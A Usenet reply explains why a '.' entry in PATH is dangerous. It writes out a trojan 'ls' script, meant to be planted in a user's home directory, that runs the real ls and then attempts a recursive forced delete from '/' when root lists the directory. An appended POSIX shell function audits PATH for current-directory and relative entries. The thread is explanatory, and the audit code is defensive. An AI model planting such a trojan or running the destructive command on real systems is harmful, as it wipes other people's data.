
Re: Why having the . at the end of someone's PATH is a security ?



> > There shouldn't be a "." in your PATH; even at the end, it's a
> > security risk. 
> 
> Why? How can it be exploited?

Simple - I put a program called ls in my home directory of a machine I
want to wreck.

#!/bin/bash
/usr/bin/ls
cd /
rm -r -f

and make it executable. Root cds to my directory to check up on something,
and does an ls. Voila - one hosed system, and chances are he won't notice
until at least some damage is done.

Matthew


-- 
Elen sila lumenn' omentielvo

Steward of the Cambridge Tolkien Society
Selwyn College Computer Support
http://www.geocities.com/Area51/Chamber/8841/
http://www.cam.ac.uk/CambUniv/Societies/tolkien/
http://pick.sel.cam.ac.uk/
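
A defensive check for the problem discussed in this thread, as an added example that is not part of the original message: a POSIX shell function that reports PATH entries the shell resolves relative to the current directory (".", an empty entry, or any relative path). The function name audit_path and the sample PATH value are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original thread): audit a PATH-style string
# for entries the shell resolves relative to the current working directory.
# The name audit_path and the sample value below are constructed.

# audit_path PATHSTRING
# Prints one line per risky entry. Returns 0 if none found, 1 otherwise.
audit_path() {
    ap_rest="${1}:"      # sentinel colon keeps a trailing empty entry
    ap_pos=0
    ap_bad=0
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}     # text before the first colon
        ap_rest=${ap_rest#*:}       # text after the first colon
        ap_pos=$((ap_pos + 1))
        case $ap_entry in
            "")
                # A leading colon, a trailing colon or "::" each produce
                # an empty entry, which means the current directory.
                echo "entry $ap_pos: empty entry (current directory)"
                ap_bad=$((ap_bad + 1)) ;;
            .|./)
                echo "entry $ap_pos: '$ap_entry' (current directory)"
                ap_bad=$((ap_bad + 1)) ;;
            /*)
                ;;  # absolute path: not affected by where you cd
            *)
                echo "entry $ap_pos: '$ap_entry' (relative path)"
                ap_bad=$((ap_bad + 1)) ;;
        esac
    done
    [ "$ap_bad" -eq 0 ]
}

# Constructed sample; replace with "$PATH" to check a real session.
audit_path "/usr/local/bin:/usr/bin::/bin:." || echo "PATH needs cleaning"
```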

